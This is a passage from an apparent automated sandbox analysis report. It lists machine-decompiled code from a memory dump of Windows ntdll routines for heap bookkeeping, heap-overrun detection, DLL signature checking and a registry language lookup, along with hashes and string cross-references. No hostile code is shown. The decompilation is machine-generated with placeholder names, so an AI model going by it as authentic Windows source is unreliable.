					__eflags =  *0x1a67bc8;
					if(__eflags == 0) {
						E01A32073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E01A3A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x1a68720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x1a68720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E0199B8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E01A3A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E0199E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                                      0x0199b746
                                      0x0199b74b
                                      0x0199b74d
                                      0x0199b750
                                      0x0199b755
                                      0x0199b758
                                      0x0199b758
                                      0x0199b75e
                                      0x0199b763
                                      0x0199b764
                                      0x0199b76a
                                      0x0199b76d
                                      0x0199b771
                                      0x0199b776
                                      0x0199b85c
                                      0x0199b85d
                                      0x0199b860
                                      0x0199b865
                                      0x019e2ba1
                                      0x019e2ba2
                                      0x019e2ba9
                                      0x019e2bae
                                      0x019e2bae
                                      0x0199b77c
                                      0x0199b77c
                                      0x0199b77c
                                      0x0199b785
                                      0x0199b788
                                      0x019e2bb6
                                      0x019e2bb9
                                      0x00000000
                                      0x00000000
                                      0x019e2bbf
                                      0x019e2bc5
                                      0x019e2bc9
                                      0x019e2be8
                                      0x019e2bed
                                      0x019e2bcb
                                      0x019e2be0
                                      0x019e2be5
                                      0x019e2bf3
                                      0x019e2bf8
                                      0x019e2bfd
                                      0x019e2c05
                                      0x019e2c0e
                                      0x019e2c0e
                                      0x00000000
                                      0x0199b78e
                                      0x0199b78e
                                      0x0199b78e
                                      0x0199b791
                                      0x0199b791
                                      0x0199b797
                                      0x0199b797
                                      0x0199b79f
                                      0x0199b7a9
                                      0x0199b7af
                                      0x0199b7af
                                      0x0199b7b1
                                      0x0199b7b6
                                      0x0199b7e2
                                      0x0199b7e2
                                      0x0199b7e7
                                      0x0199b880
                                      0x0199b7ed
                                      0x0199b7ed
                                      0x0199b7ed
                                      0x0199b7ef
                                      0x0199b7f2
                                      0x0199b7f2
                                      0x0199b7f5
                                      0x0199b7fa
                                      0x019e2c2d
                                      0x019e2c2e
                                      0x019e2c39
                                      0x0199b800
                                      0x0199b800
                                      0x0199b802
                                      0x0199b805
                                      0x0199b808
                                      0x0199b808
                                      0x0199b80a
                                      0x0199b80d
                                      0x0199b816
                                      0x0199b81c
                                      0x0199b822
                                      0x0199b82f
                                      0x0199b88b
                                      0x0199b892
                                      0x0199b897
                                      0x0199b899
                                      0x0199b89b
                                      0x0199b89e
                                      0x0199b8a5
                                      0x0199b8a8
                                      0x0199b8aa
                                      0x0199b8ac
                                      0x0199b8ac
                                      0x0199b8aa
                                      0x0199b892
                                      0x0199b831
                                      0x0199b839
                                      0x0199b83b
                                      0x0199b83b
                                      0x0199b844
                                      0x0199b84b
                                      0x0199b852
                                      0x0199b7b8
                                      0x0199b7ba
                                      0x0199b7bf
                                      0x0199b7c4
                                      0x019e2c18
                                      0x019e2c19
                                      0x019e2c23
                                      0x0199b7ca
                                      0x0199b7ca
                                      0x0199b7cc
                                      0x0199b7cf
                                      0x0199b7d1
                                      0x0199b7d1
                                      0x0199b7d4
                                      0x0199b7dc
                                      0x0199b8bb
                                      0x0199b8bb
                                      0x0199b8be
                                      0x0199b8be
                                      0x0199b8c1
                                      0x00000000
                                      0x00000000
                                      0x0199b8c3
                                      0x0199b8c5
                                      0x0199b8c7
                                      0x0199b8e0
                                      0x00000000
                                      0x0199b8e0
                                      0x0199b8cc
                                      0x0199b8cc
                                      0x00000000
                                      0x0199b8cc
                                      0x0199b8d6
                                      0x0199b8d6
                                      0x00000000
                                      0x0199b7dc
                                      0x0199b7b6

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                      • API String ID: 0-1334570610
                                      • Opcode ID: 61ba5ae976c88285ff5a080b7c8dbe63d4c1a394ccb6d7a3331840b358787b91
                                      • Instruction ID: 7412318d6823e241578cd2a1d699d645a4bd4e8094dadea9ea46eb8eaf606606
                                      • Opcode Fuzzy Hash: 61ba5ae976c88285ff5a080b7c8dbe63d4c1a394ccb6d7a3331840b358787b91
                                      • Instruction Fuzzy Hash: 7B61AC706002019FDB29CF2DD484F6ABBE9FF48305F18856AE84E8F651D734E881CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01987E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 98%
                                      			E01987E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0198CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0197C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1a65780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E019F5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1a65780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01997D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01997D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E019F7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01997D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01997D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E019F7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E019AA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0197B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                      0x01987e4c
                                      0x01987e50
                                      0x01987e55
                                      0x01987e58
                                      0x01987e5d
                                      0x01987e71
                                      0x01987f33
                                      0x01987e77
                                      0x01987e77
                                      0x01987e79
                                      0x01987e79
                                      0x01987e7e
                                      0x01987f45
                                      0x019d9848
                                      0x00000000
                                      0x019d9848
                                      0x01987f4e
                                      0x01987f53
                                      0x01987f5a
                                      0x00000000
                                      0x00000000
                                      0x019d985a
                                      0x019d9862
                                      0x019d9866
                                      0x00000000
                                      0x019d986c
                                      0x00000000
                                      0x019d986c
                                      0x01987e84
                                      0x01987e84
                                      0x01987e8d
                                      0x019d9871
                                      0x01987eb8
                                      0x01987ec0
                                      0x01987ec0
                                      0x01987e9a
                                      0x019d987e
                                      0x00000000
                                      0x00000000
                                      0x019d9884
                                      0x019d988b
                                      0x019d98a7
                                      0x019d98ac
                                      0x019d98b1
                                      0x019d98b6
                                      0x019d98b8
                                      0x019d98b8
                                      0x019d98b9
                                      0x00000000
                                      0x019d98b9
                                      0x01987ea0
                                      0x01987ea7
                                      0x00000000
                                      0x00000000
                                      0x01987eac
                                      0x01987eb1
                                      0x01987ec6
                                      0x01987ed0
                                      0x019d98cc
                                      0x01987ed6
                                      0x01987ed6
                                      0x01987ed6
                                      0x01987ede
                                      0x01987ee3
                                      0x019d98e3
                                      0x019d98f0
                                      0x019d9902
                                      0x019d98f2
                                      0x019d98fb
                                      0x019d98fb
                                      0x019d9907
                                      0x019d991d
                                      0x019d991d
                                      0x019d9907
                                      0x019d98e3
                                      0x01987ef0
                                      0x01987f14
                                      0x01987f14
                                      0x01987f1e
                                      0x019d9946
                                      0x01987f24
                                      0x01987f24
                                      0x01987f24
                                      0x01987f2c
                                      0x019d996a
                                      0x019d9975
                                      0x019d9975
                                      0x019d997e
                                      0x019d9993
                                      0x019d9993
                                      0x019d997e
                                      0x00000000
                                      0x01987ef2
                                      0x01987efc
                                      0x01987f0a
                                      0x01987f0e
                                      0x019d9933
                                      0x00000000
                                      0x019d9933
                                      0x00000000
                                      0x01987f0e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x01987eb1

                                      Strings
                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 019D9891
                                      • minkernel\ntdll\ldrmap.c, xrefs: 019D98A2
                                      • LdrpCompleteMapModule, xrefs: 019D9898
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                      • API String ID: 0-1676968949
                                      • Opcode ID: b7df8047e69e48525a33bc06af2bc9ff4c02ef3b3df14ab52826b83623b6e0e5
                                      • Instruction ID: 9044d81e0a94e7bf332b89af20cb1dbf437ce1ccf7eb7869e13f90cd9b7e2158
                                      • Opcode Fuzzy Hash: b7df8047e69e48525a33bc06af2bc9ff4c02ef3b3df14ab52826b83623b6e0e5
                                      • Instruction Fuzzy Hash: A8512531600745DBEB29EB9CC984F2A7BE8AF41714F240599E9599B7E2C734FD00CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01A223E3, Relevance: 3.9, Strings: 3, Instructions: 166COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 64%
                                      			E01A223E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x1a6874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x1a6874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E019CD4F0(_t83, 0x1956c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0197B150();
					} else {
						E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E0197B150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1a66378 = 1;
						asm("int3");
						 *0x1a66378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}




























                                      0x01a223e3
                                      0x01a223e8
                                      0x01a223eb
                                      0x01a223ee
                                      0x01a223f3
                                      0x01a2259b
                                      0x01a2259b
                                      0x01a2259d
                                      0x01a225a3
                                      0x01a225a3
                                      0x01a223fb
                                      0x01a22424
                                      0x01a2244f
                                      0x01a22460
                                      0x01a22451
                                      0x01a22451
                                      0x01a22456
                                      0x01a22458
                                      0x01a22458
                                      0x01a2245b
                                      0x01a2245b
                                      0x01a22426
                                      0x01a22431
                                      0x01a22436
                                      0x01a22443
                                      0x01a22438
                                      0x01a22438
                                      0x01a22438
                                      0x01a22445
                                      0x01a22445
                                      0x01a22463
                                      0x01a22469
                                      0x01a2246f
                                      0x01a22480
                                      0x01a22495
                                      0x01a224a1
                                      0x01a224ce
                                      0x01a224df
                                      0x01a224d0
                                      0x01a224d0
                                      0x01a224d5
                                      0x01a224d7
                                      0x01a224d7
                                      0x01a224da
                                      0x01a224da
                                      0x01a224a3
                                      0x01a224b0
                                      0x01a224b5
                                      0x01a224c2
                                      0x01a224b7
                                      0x01a224b7
                                      0x01a224b7
                                      0x01a224c4
                                      0x01a224c4
                                      0x01a224e8
                                      0x01a22497
                                      0x01a2249a
                                      0x01a2249a
                                      0x01a22482
                                      0x01a22488
                                      0x01a22488
                                      0x01a22471
                                      0x01a22479
                                      0x01a22479
                                      0x01a224ef
                                      0x01a223fd
                                      0x01a22401
                                      0x01a22412
                                      0x01a22403
                                      0x01a22403
                                      0x01a22408
                                      0x01a2240a
                                      0x01a2240a
                                      0x01a2240d
                                      0x01a2240d
                                      0x01a2241b
                                      0x01a2241b
                                      0x01a224f1
                                      0x01a224f6
                                      0x01a22507
                                      0x01a22510
                                      0x00000000
                                      0x01a22510
                                      0x01a2250b
                                      0x00000000
                                      0x01a224f8
                                      0x01a224f8
                                      0x01a224fc
                                      0x01a22500
                                      0x01a22512
                                      0x01a22515
                                      0x01a2251a
                                      0x01a22521
                                      0x01a22524
                                      0x01a22529
                                      0x01a2252f
                                      0x00000000
                                      0x00000000
                                      0x01a2253c
                                      0x01a2255c
                                      0x01a22561
                                      0x01a2253e
                                      0x01a22554
                                      0x01a22559
                                      0x01a2256a
                                      0x01a2256d
                                      0x01a22574
                                      0x01a22586
                                      0x01a22588
                                      0x01a2258f
                                      0x01a22590
                                      0x01a22590
                                      0x01a22597
                                      0x00000000
                                      0x01a22597

                                      Strings
                                      • HEAP: , xrefs: 01A2255C
                                      • HEAP[%wZ]: , xrefs: 01A2254F
                                      • Heap block at %p modified at %p past requested size of %Ix, xrefs: 01A2256F
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                      • API String ID: 0-3815128232
                                      • Opcode ID: f7633d2fc537ca4740dcbe3f0b1f204f5580ab3459056dbe5bc6fbfc67e3c585
                                      • Instruction ID: a517dac3026e7c455087a0e0dad245b792c335b23e8f3bb7add643887298acda
                                      • Opcode Fuzzy Hash: f7633d2fc537ca4740dcbe3f0b1f204f5580ab3459056dbe5bc6fbfc67e3c585
                                      • Instruction Fuzzy Hash: 5B51F3341002708AE375CF2EC8447B27BF1EF88645F58885BE9D78B286D67AD847DB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0197E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 93%
                                      			E0197E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0197F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E019B95D0();
						}
						if(_t78 != 0) {
							L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E019BFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E019BBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E019B9600();
					if(_t97 < 0) {
						goto L6;
					}
					E019BBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0197F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E019BBB40(_t83, _t102 + 0x24, _t78);
								if(L019843C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E019BBB40(_t84, _t102 + 0x24, _t94);
									if(L019843C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                      0x0197e620
                                      0x0197e628
                                      0x0197e62f
                                      0x0197e631
                                      0x0197e635
                                      0x0197e637
                                      0x0197e63e
                                      0x019d5503
                                      0x019d5503
                                      0x0197e64c
                                      0x0197e64c
                                      0x0197e651
                                      0x00000000
                                      0x00000000
                                      0x0197e661
                                      0x0197e665
                                      0x019d542a
                                      0x0197e715
                                      0x0197e71a
                                      0x0197e71c
                                      0x0197e720
                                      0x0197e720
                                      0x0197e727
                                      0x0197e736
                                      0x0197e736
                                      0x0197e743
                                      0x0197e743
                                      0x0197e673
                                      0x0197e678
                                      0x0197e67d
                                      0x0197e682
                                      0x0197e685
                                      0x0197e692
                                      0x0197e69b
                                      0x0197e6a3
                                      0x0197e6ad
                                      0x0197e6b1
                                      0x0197e6b2
                                      0x0197e6bb
                                      0x0197e6bf
                                      0x0197e6c0
                                      0x0197e6c8
                                      0x0197e6cc
                                      0x0197e6d5
                                      0x0197e6d9
                                      0x00000000
                                      0x00000000
                                      0x0197e6e5
                                      0x0197e6ea
                                      0x0197e6f9
                                      0x0197e70b
                                      0x0197e70f
                                      0x019d5439
                                      0x019d545e
                                      0x019d545e
                                      0x00000000
                                      0x019d545e
                                      0x019d543b
                                      0x019d543e
                                      0x019d5440
                                      0x019d5445
                                      0x019d5472
                                      0x019d5475
                                      0x019d548d
                                      0x019d5493
                                      0x019d54a9
                                      0x00000000
                                      0x00000000
                                      0x019d54ab
                                      0x019d54b4
                                      0x019d54bc
                                      0x019d54c8
                                      0x019d54de
                                      0x019d54fb
                                      0x019d54e0
                                      0x019d54e6
                                      0x019d54eb
                                      0x019d54eb
                                      0x019d54de
                                      0x00000000
                                      0x019d54bc
                                      0x019d5477
                                      0x019d547a
                                      0x019d5480
                                      0x019d5483
                                      0x019d5486
                                      0x019d548b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x019d548b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x019d5447
                                      0x019d5447
                                      0x019d5447
                                      0x019d5447
                                      0x019d544e
                                      0x00000000
                                      0x00000000
                                      0x019d5450
                                      0x019d5452
                                      0x019d5455
                                      0x019d545a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x019d545c
                                      0x019d546a
                                      0x019d546d
                                      0x019d546f
                                      0x00000000
                                      0x019d546f
                                      0x0197e70f

                                      Strings
                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0197E68C
                                      • InstallLanguageFallback, xrefs: 0197E6DB
                                      • @, xrefs: 0197E6C0
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                      • API String ID: 0-1757540487
                                      • Opcode ID: 411cc06e2d88002a72f8a46a86e137b3d52df88abfa18594f6961b13b9f96ad4
                                      • Instruction ID: 3d90f2231a538eb31978d53167aa21195b7ddec5352157f1d1ce02d2327e1118
                                      • Opcode Fuzzy Hash: 411cc06e2d88002a72f8a46a86e137b3d52df88abfa18594f6961b13b9f96ad4
                                      • Instruction Fuzzy Hash: 9151C1715043069BE711DF28C480AABB7E8BF88755F45496EF98DD7240F730D904C7A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0199B8E4, Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
